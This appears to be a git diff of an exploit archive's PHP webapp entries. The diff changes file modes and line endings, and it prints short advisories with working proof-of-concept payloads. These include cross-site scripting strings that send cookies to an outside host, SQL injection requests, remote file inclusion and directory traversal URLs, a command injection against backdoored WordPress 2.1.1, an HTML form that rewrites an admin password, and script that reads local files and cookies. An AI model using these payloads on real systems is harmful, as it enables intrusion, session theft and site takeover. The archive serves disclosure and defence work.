of file diff --git a/platforms/php/webapps/29682.txt b/platforms/php/webapps/29682.txt old mode 100755 new mode 100644 index 7212b71d1..d95a6041e --- a/platforms/php/webapps/29682.txt +++ b/platforms/php/webapps/29682.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Wordpress 2.1.1 is vulnerable to this issue; other versions may also be affected. -Cookie in an Alert Box: <iframe width=600 height=400 src='http://www.example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol= %27'></iframe> Cookie send to an Evil Host: <iframe width=600 height=400 src='http://www.example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);im age.src=%27http://www.example.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe> \ No newline at end of file +Cookie in an Alert Box: <iframe width=600 height=400 src='http://www.example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol= %27'></iframe> Cookie send to an Evil Host: <iframe width=600 height=400 src='http://www.example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);im age.src=%27http://www.example.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe> \ No newline at end of file diff --git a/platforms/php/webapps/29684.txt b/platforms/php/webapps/29684.txt old mode 100755 new mode 100644 index e92df7992..c3de6c007 --- a/platforms/php/webapps/29684.txt +++ b/platforms/php/webapps/29684.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Version 2.1.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E categories.php) http://www.example.com/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E categories.php) http://www.example.com/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/2969.txt b/platforms/php/webapps/2969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29694.txt b/platforms/php/webapps/29694.txt old mode 100755 new mode 100644 index 110b595e4..e24c3a759 --- a/platforms/php/webapps/29694.txt +++ b/platforms/php/webapps/29694.txt @@ -4,4 +4,4 @@ Serendipity is affected by an SQL-injection vulnerability because the applicatio Exploiting this vulnerability could permit remote attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. -POST /serendipity/index.php?frontpage HTTP/1.0 User-Agent: Mozilla/5.0 (SaMuschie) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 67 Connection: close serendipity%5BmultiCat%5D%5B%5D='&serendipity%5BisMultiCat%5D=Go%21 \ No newline at end of file +POST /serendipity/index.php?frontpage HTTP/1.0 User-Agent: Mozilla/5.0 (SaMuschie) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 67 Connection: close serendipity%5BmultiCat%5D%5B%5D='&serendipity%5BisMultiCat%5D=Go%21 \ No newline at end of file diff --git a/platforms/php/webapps/29696.txt b/platforms/php/webapps/29696.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29697.txt b/platforms/php/webapps/29697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29698.txt b/platforms/php/webapps/29698.txt old mode 100755 new mode 100644 index 6bbcfbfef..1be58b40f --- a/platforms/php/webapps/29698.txt +++ b/platforms/php/webapps/29698.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect versions prior to 1.0.3; prior versions may also be affected. -http://www.example.com/[path]/rating.php?nid=[Xss-Script] http://www.example.com/[path]/news.php?nid=[Xss-Script] \ No newline at end of file +http://www.example.com/[path]/rating.php?nid=[Xss-Script] http://www.example.com/[path]/news.php?nid=[Xss-Script] \ No newline at end of file diff --git a/platforms/php/webapps/2970.txt b/platforms/php/webapps/2970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29700.txt b/platforms/php/webapps/29700.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29701.txt b/platforms/php/webapps/29701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29702.txt b/platforms/php/webapps/29702.txt old mode 100755 new mode 100644 index 65bde37b4..44f9e50be --- a/platforms/php/webapps/29702.txt +++ b/platforms/php/webapps/29702.txt @@ -4,4 +4,4 @@ An attacker compromised the source code for Wordpress 2.1.1 and altered it to in The vendor has acknowledged this vulnerability and recommends that all users who have installed version 2.1.1 upgrade to version 2.1.2 or later. This issue appears limited to the 2.1.1 release. -http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd \ No newline at end of file +http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/29703.txt b/platforms/php/webapps/29703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29704.txt b/platforms/php/webapps/29704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29705.txt b/platforms/php/webapps/29705.txt old mode 100755 new mode 100644 index d31706c71..4d318d9bd --- a/platforms/php/webapps/29705.txt +++ b/platforms/php/webapps/29705.txt @@ -4,4 +4,4 @@ Tyger Bug Tracking System is prone to multiple input-validation vulnerabilities, Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, retrieve and overwrite sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. -http://www.example.com/Register.php/>">[XSS] \ No newline at end of file +http://www.example.com/Register.php/>">[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2971.txt b/platforms/php/webapps/2971.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29715.txt b/platforms/php/webapps/29715.txt old mode 100755 new mode 100644 index d8bc88276..66bc47ad3 --- a/platforms/php/webapps/29715.txt +++ b/platforms/php/webapps/29715.txt @@ -4,4 +4,4 @@ ePortfolio is prone to a client-side input-validation vulnerability because the An attacker can exploit this issue to perform various attacks that are caused by input-validation vulnerabilities. These may include cross-site scripting attacks, SQL-injection attacks, and possibly others. -http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file +http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/29722.txt b/platforms/php/webapps/29722.txt old mode 100755 new mode 100644 index 6f44e31d3..c975f26d7 --- a/platforms/php/webapps/29722.txt +++ b/platforms/php/webapps/29722.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Version 1.3.1 is vulnerable; other versions may also be affected. -http://www.example.com/Path_Script/createurl.php?formurl=[Shell-Attack] \ No newline at end of file +http://www.example.com/Path_Script/createurl.php?formurl=[Shell-Attack] \ No newline at end of file diff --git a/platforms/php/webapps/29727.txt b/platforms/php/webapps/29727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29728.txt b/platforms/php/webapps/29728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29729.txt b/platforms/php/webapps/29729.txt old mode 100755 new mode 100644 index 809660932..7331b7eb4 --- a/platforms/php/webapps/29729.txt +++ b/platforms/php/webapps/29729.txt @@ -4,4 +4,4 @@ Premod SubDog 2 is prone to multiple remote file-include vulnerabilities. An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/[path]/includes/logger_engine.php?phpbb_root_path=[Shell-Attack] \ No newline at end of file +http://www.example.com/[path]/includes/logger_engine.php?phpbb_root_path=[Shell-Attack] \ No newline at end of file diff --git a/platforms/php/webapps/2973.txt b/platforms/php/webapps/2973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29730.txt b/platforms/php/webapps/29730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29731.txt b/platforms/php/webapps/29731.txt old mode 100755 new mode 100644 index df5d605e1..fd358acfa --- a/platforms/php/webapps/29731.txt +++ b/platforms/php/webapps/29731.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to include an arbitrary remote file contain NOTE: Further information reveals that the reported vulnerable parameter is actually a constant, not a variable, so it cannot be controlled by an attacker. Since the application is not vulnerable, this BID is being retired. -http://www.example.com/engine/Ajax/editnews.php?root_dir=[Shell-Attack]k] \ No newline at end of file +http://www.example.com/engine/Ajax/editnews.php?root_dir=[Shell-Attack]k] \ No newline at end of file diff --git a/platforms/php/webapps/29733.txt b/platforms/php/webapps/29733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29736.txt b/platforms/php/webapps/29736.txt old mode 100755 new mode 100644 index a6ef3ffc0..5ee0ac921 --- a/platforms/php/webapps/29736.txt +++ b/platforms/php/webapps/29736.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects version 1.5.3; other versions may also be vulnerable. -http://www.example.com/Path/include/adodb-connection.inc.php?cmd=[Shell-Attack] \ No newline at end of file +http://www.example.com/Path/include/adodb-connection.inc.php?cmd=[Shell-Attack] \ No newline at end of file diff --git a/platforms/php/webapps/29737.txt b/platforms/php/webapps/29737.txt old mode 100755 new mode 100644 index c19f89c51..5baf40939 --- a/platforms/php/webapps/29737.txt +++ b/platforms/php/webapps/29737.txt @@ -7,4 +7,4 @@ Exploiting this issue may allow an unauthorized user to view local files on the This issue affects version 0.0.1; other versions may also be affected. -http://www.example.com/[path]/check_vote.php?order=../../../../etc/passwd \ No newline at end of file +http://www.example.com/[path]/check_vote.php?order=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/29742.txt b/platforms/php/webapps/29742.txt old mode 100755 new mode 100644 index f157b8de1..458908a22 --- a/platforms/php/webapps/29742.txt +++ b/platforms/php/webapps/29742.txt @@ -4,4 +4,4 @@ Horde IMP Webmail Client is prone to multiple input-validation vulnerabilities, Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. -http://www.example.com/horde/imp/search.php?edit_query=[xss] \ No newline at end of file +http://www.example.com/horde/imp/search.php?edit_query=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29744.txt b/platforms/php/webapps/29744.txt old mode 100755 new mode 100644 index 252085af2..761d32bb8 --- a/platforms/php/webapps/29744.txt +++ b/platforms/php/webapps/29744.txt @@ -4,4 +4,4 @@ Viper Web Portal is prone to a remote file-include vulnerability because it fail Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/index.php?modpath=http://www.example2.com/evilscript? \ No newline at end of file +http://www.example.com/index.php?modpath=http://www.example2.com/evilscript? \ No newline at end of file diff --git a/platforms/php/webapps/29745.txt b/platforms/php/webapps/29745.txt old mode 100755 new mode 100644 index 90959d6bc..1103cd83e --- a/platforms/php/webapps/29745.txt +++ b/platforms/php/webapps/29745.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would execute in the context of the affec This issue affects versions prior to 3.1.4. -http://www.example.com/horde/[Horde_App]/login.php?new_lang=[xss] \ No newline at end of file +http://www.example.com/horde/[Horde_App]/login.php?new_lang=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29747.txt b/platforms/php/webapps/29747.txt old mode 100755 new mode 100644 index bc456549a..9e9f610a2 --- a/platforms/php/webapps/29747.txt +++ b/platforms/php/webapps/29747.txt @@ -4,4 +4,4 @@ DirectAdmin is prone to a cross-site scripting vulnerability because the applica An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/CMD_USER_STATS?RESULT='http://example2.com/script.js' \ No newline at end of file +http://www.example.com/CMD_USER_STATS?RESULT='http://example2.com/script.js' \ No newline at end of file diff --git a/platforms/php/webapps/29748.txt b/platforms/php/webapps/29748.txt old mode 100755 new mode 100644 index 188d9c930..5cbb5fefc --- a/platforms/php/webapps/29748.txt +++ b/platforms/php/webapps/29748.txt @@ -4,4 +4,4 @@ Holtstraeter Rot 13 is prone to a directory-traversal vulnerability because it f An attacker can exploit this vulnerability to retrieve the contents of arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks. -http://www.example.com/enkrypt.php?datei=../../../../etc/passwd \ No newline at end of file +http://www.example.com/enkrypt.php?datei=../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/29750.php b/platforms/php/webapps/29750.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29751.php b/platforms/php/webapps/29751.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29754.html b/platforms/php/webapps/29754.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29755.html b/platforms/php/webapps/29755.html old mode 100755 new mode 100644 index 310c830e7..b3e7c1331 --- a/platforms/php/webapps/29755.html +++ b/platforms/php/webapps/29755.html @@ -5,4 +5,4 @@ password. Exploiting this issue may allow an attacker to gain administrative access to the affected application. Successful exploits will result in a complete compromise of the application. -<html> <title>Guestbara <= 1.2 Change admin login & password exploit by Kacper</title> <table border=0 cellspacing=0 cellpadding=0 align='center'> <form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr> <tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr> <tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr> <tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr> <tr><td colspan=2 align=center> <p> <input type='submit' name='submit' value='Zachowaj'> </p> <p>by Kacper </p> <p>for</p> <p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr> </form></table> <p>&nbsp;</p> <p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p> <p align="center">Greetz @ll DEVIL TEAM </p> </html> \ No newline at end of file +<html> <title>Guestbara <= 1.2 Change admin login & password exploit by Kacper</title> <table border=0 cellspacing=0 cellpadding=0 align='center'> <form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr> <tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr> <tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr> <tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr> <tr><td colspan=2 align=center> <p> <input type='submit' name='submit' value='Zachowaj'> </p> <p>by Kacper </p> <p>for</p> <p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr> </form></table> <p>&nbsp;</p> <p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p> <p align="center">Greetz @ll DEVIL TEAM </p> </html> \ No newline at end of file diff --git a/platforms/php/webapps/29756.txt b/platforms/php/webapps/29756.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29757.txt b/platforms/php/webapps/29757.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29758.txt b/platforms/php/webapps/29758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29759.php b/platforms/php/webapps/29759.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2976.txt b/platforms/php/webapps/2976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29760.txt b/platforms/php/webapps/29760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29762.txt b/platforms/php/webapps/29762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29763.php b/platforms/php/webapps/29763.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29764.txt b/platforms/php/webapps/29764.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29765.txt b/platforms/php/webapps/29765.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29766.txt b/platforms/php/webapps/29766.txt old mode 100755 new mode 100644 index d315ae14a..73f9f7270 --- a/platforms/php/webapps/29766.txt +++ b/platforms/php/webapps/29766.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica w-Agora 4.2.1 is vulnerable. -http://www.example.com/w-agora/change_password.php?newpasswd1=1&newpasswd2=1&passwd=1&site=hello&userid='"><script>alert(documen t.cookie)</script> \ No newline at end of file +http://www.example.com/w-agora/change_password.php?newpasswd1=1&newpasswd2=1&passwd=1&site=hello&userid='"><script>alert(documen t.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2977.txt b/platforms/php/webapps/2977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29772.txt b/platforms/php/webapps/29772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29773.txt b/platforms/php/webapps/29773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29774.txt b/platforms/php/webapps/29774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29775.txt b/platforms/php/webapps/29775.txt old mode 100755 new mode 100644 index b7085c0fd..04b7a0052 --- a/platforms/php/webapps/29775.txt +++ b/platforms/php/webapps/29775.txt @@ -8,4 +8,4 @@ Version 2.0 is vulnerable to these issues. http://www.example.com/imageupload_path/login.php?AD_BODY_TEMP=Shell? http://www.example.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell? -http://www.example.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell? \ No newline at end of file +http://www.example.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell? \ No newline at end of file diff --git a/platforms/php/webapps/29776.txt b/platforms/php/webapps/29776.txt old mode 100755 new mode 100644 index 115e1753a..954fb41ed --- a/platforms/php/webapps/29776.txt +++ b/platforms/php/webapps/29776.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow CcCounter version 2.0 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/cccounter_path/index.php?option=browser&dir=%3Cscript%3Ealert(/Crackers_Child/)%3C/script%3E \ No newline at end of file +http://www.example.com/cccounter_path/index.php?option=browser&dir=%3Cscript%3Ealert(/Crackers_Child/)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/29780.txt b/platforms/php/webapps/29780.txt old mode 100755 new mode 100644 index c3f73a0a8..c0c2c8acf --- a/platforms/php/webapps/29780.txt +++ b/platforms/php/webapps/29780.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Mephisto Blog version 0.7.3 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/search?q="/><script>window.location="http://www.example2.com/script.php?data="+document.cookie</script> \ No newline at end of file +http://www.example.com/search?q="/><script>window.location="http://www.example2.com/script.php?data="+document.cookie</script> \ No newline at end of file diff --git a/platforms/php/webapps/29782.txt b/platforms/php/webapps/29782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29783.txt b/platforms/php/webapps/29783.txt old mode 100755 new mode 100644 index 528ad1923..2a60ea7ed --- a/platforms/php/webapps/29783.txt +++ b/platforms/php/webapps/29783.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would run in the context of the affected This issue affects version 0.5; other versions may also be affected. -- ------------------------------------------------------------------------- POC: Local File Reading and Cookie Reading (The HTML entities MUST be used) - ------------------------------------------------------------------------- <script> function read(readfile) { var file = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile); file.initWithPath(readfile); var is = Components.classes["@mozilla.org/network/file-input-stream;1"] .createInstance(Components.interfaces.nsIFileInputStream); is.init(file, 0x01, 00004, null); var sis = Components.classes["@mozilla.org/scriptableinputstream;1"] .createInstance(Components.interfaces.nsIScriptableInputStream); sis.init(is); var output = sis.read(sis.available()); alert(output); } read("C:\test.txt"); function getCookies() { var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"] .getService(Components.interfaces.nsICookieManager); var str = ''; var iter = cookieManager.enumerator; while (iter.hasMoreElements()) { var cookie = iter.getNext(); if (cookie instanceof Components.interfaces.nsICookie) { str += "Host: " + cookie.host + "\nName: " + cookie.name + "\nValue: " + cookie.value + "\n\n"; } } alert(str); } getCookies() </script> \ No newline at end of file +- ------------------------------------------------------------------------- POC: Local File Reading and Cookie Reading (The HTML entities MUST be used) - ------------------------------------------------------------------------- <script> function read(readfile) { var file = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile); file.initWithPath(readfile); var is = Components.classes["@mozilla.org/network/file-input-stream;1"] .createInstance(Components.interfaces.nsIFileInputStream); is.init(file, 0x01, 00004, null); var sis = Components.classes["@mozilla.org/scriptableinputstream;1"] .createInstance(Components.interfaces.nsIScriptableInputStream); sis.init(is); var output = sis.read(sis.available()); alert(output); } read("C:\test.txt"); function getCookies() { var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"] .getService(Components.interfaces.nsICookieManager); var str = ''; var iter = cookieManager.enumerator; while (iter.hasMoreElements()) { var cookie = iter.getNext(); if (cookie instanceof Components.interfaces.nsICookie) { str += "Host: " + cookie.host + "\nName: " + cookie.name + "\nValue: " + cookie.value + "\n\n"; } } alert(str); } getCookies() </script> \ No newline at end of file diff --git a/platforms/php/webapps/29786.txt b/platforms/php/webapps/29786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29789.txt b/platforms/php/webapps/29789.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2979.txt b/platforms/php/webapps/2979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29790.txt b/platforms/php/webapps/29790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29797.txt b/platforms/php/webapps/29797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2980.txt b/platforms/php/webapps/2980.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29805.txt b/platforms/php/webapps/29805.txt old mode 100755 new mode 100644 index 3133e26fb..ee27aff61 --- a/platforms/php/webapps/29805.txt +++ b/platforms/php/webapps/29805.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l Version 0.3.7 Beta is vulnerable; other versions may also be affected. -http://www.example.com/path/404.php?d_private=../../etc/passwd? \ No newline at end of file +http://www.example.com/path/404.php?d_private=../../etc/passwd? \ No newline at end of file diff --git a/platforms/php/webapps/2981.php b/platforms/php/webapps/2981.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2982.txt b/platforms/php/webapps/2982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29821.txt b/platforms/php/webapps/29821.txt old mode 100755 new mode 100644 index 850303c2e..896fabe37 --- a/platforms/php/webapps/29821.txt +++ b/platforms/php/webapps/29821.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Livor 2.5 is vulnerable; other versions may also be affected. -http://www.example.com/path/index.php?page=[XSS] \ No newline at end of file +http://www.example.com/path/index.php?page=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/29824.txt b/platforms/php/webapps/29824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29825.txt b/platforms/php/webapps/29825.txt old mode 100755 new mode 100644 index 890d10481..bf15a6c9c --- a/platforms/php/webapps/29825.txt +++ b/platforms/php/webapps/29825.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc UBB.threads 6.1.1 and prior versions are vulnerable; other versions may also be affected. -http://www.example.com/ubbthreads.php?Cat=cat&C=' \ No newline at end of file +http://www.example.com/ubbthreads.php?Cat=cat&C=' \ No newline at end of file diff --git a/platforms/php/webapps/29828.html b/platforms/php/webapps/29828.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29829.txt b/platforms/php/webapps/29829.txt old mode 100755 new mode 100644 index 576648d79..670da895a --- a/platforms/php/webapps/29829.txt +++ b/platforms/php/webapps/29829.txt @@ -4,4 +4,4 @@ Einfacher Passworschutz is prone to a cross-site scripting vulnerability because An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/?msg=[XSS] \ No newline at end of file +http://www.example.com/?msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2983.txt b/platforms/php/webapps/2983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29830.txt b/platforms/php/webapps/29830.txt old mode 100755 new mode 100644 index cadcb09c8..1d043f216 --- a/platforms/php/webapps/29830.txt +++ b/platforms/php/webapps/29830.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include arbitrary remote files containing This issue affects MyNews 4.2.2 and prior versions. -http://www.example.com/include/blocks/week_events.php?myNewsConf[path][sys][index]=[REMOTEFILE]? \ No newline at end of file +http://www.example.com/include/blocks/week_events.php?myNewsConf[path][sys][index]=[REMOTEFILE]? \ No newline at end of file diff --git a/platforms/php/webapps/29831.txt b/platforms/php/webapps/29831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29832.txt b/platforms/php/webapps/29832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29833.txt b/platforms/php/webapps/29833.txt old mode 100755 new mode 100644 index 6b6cb43ea..ea7868e9b --- a/platforms/php/webapps/29833.txt +++ b/platforms/php/webapps/29833.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a These issues affect DropAFew 0.2; prior versions may also be affected. wget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*' -http://[target]/calorie/editlogcal.php \ No newline at end of file +http://[target]/calorie/editlogcal.php \ No newline at end of file diff --git a/platforms/php/webapps/29834.txt b/platforms/php/webapps/29834.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29838.txt b/platforms/php/webapps/29838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29839.txt b/platforms/php/webapps/29839.txt old mode 100755 new mode 100644 index ad2e220e6..db7b9ac70 --- a/platforms/php/webapps/29839.txt +++ b/platforms/php/webapps/29839.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Versions prior to 1.2.6 are vulnerable. -http://www.example.com/tools/thememng/index.php?tool_url=[XSS] \ No newline at end of file +http://www.example.com/tools/thememng/index.php?tool_url=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2984.txt b/platforms/php/webapps/2984.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29841.txt b/platforms/php/webapps/29841.txt old mode 100755 new mode 100644 index 241524cc5..5ea11aa32 --- a/platforms/php/webapps/29841.txt +++ b/platforms/php/webapps/29841.txt @@ -7,4 +7,4 @@ An attacker can exploit this vulnerability to retrieve arbitrary files from the This issue affects TopSites 3; other versions may also be vulnerable. http://www.example.com/Path/admin/index.php?page=template&modify=../../../../../../etc/passwd -http://www.example.com/Path/admin/index.php?page=template&modify=inc/config.ini.php \ No newline at end of file +http://www.example.com/Path/admin/index.php?page=template&modify=inc/config.ini.php \ No newline at end of file diff --git a/platforms/php/webapps/29845.txt b/platforms/php/webapps/29845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29846.txt b/platforms/php/webapps/29846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29847.txt b/platforms/php/webapps/29847.txt old mode 100755 new mode 100644 index 5f30e3e88..73925c653 --- a/platforms/php/webapps/29847.txt +++ b/platforms/php/webapps/29847.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br This issue affects phpwebnews 0.1; other versions may also be affected. -http://www.example.com/[path]/bukutamu.php?m_txt=[xss] \ No newline at end of file +http://www.example.com/[path]/bukutamu.php?m_txt=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29848.txt b/platforms/php/webapps/29848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29849.html b/platforms/php/webapps/29849.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29851.txt b/platforms/php/webapps/29851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29852.txt b/platforms/php/webapps/29852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29854.txt b/platforms/php/webapps/29854.txt old mode 100755 new mode 100644 index 4a78a6a75..270064a98 --- a/platforms/php/webapps/29854.txt +++ b/platforms/php/webapps/29854.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects BloofoxCMS 0.2.2; other versions may also be vulnerable. -http://www.example.com/[path]/plugins/spaw/img_popup.php?img_url=<script>alert(/the_Edit0r/);</script> \ No newline at end of file +http://www.example.com/[path]/plugins/spaw/img_popup.php?img_url=<script>alert(/the_Edit0r/);</script> \ No newline at end of file diff --git a/platforms/php/webapps/29855.txt 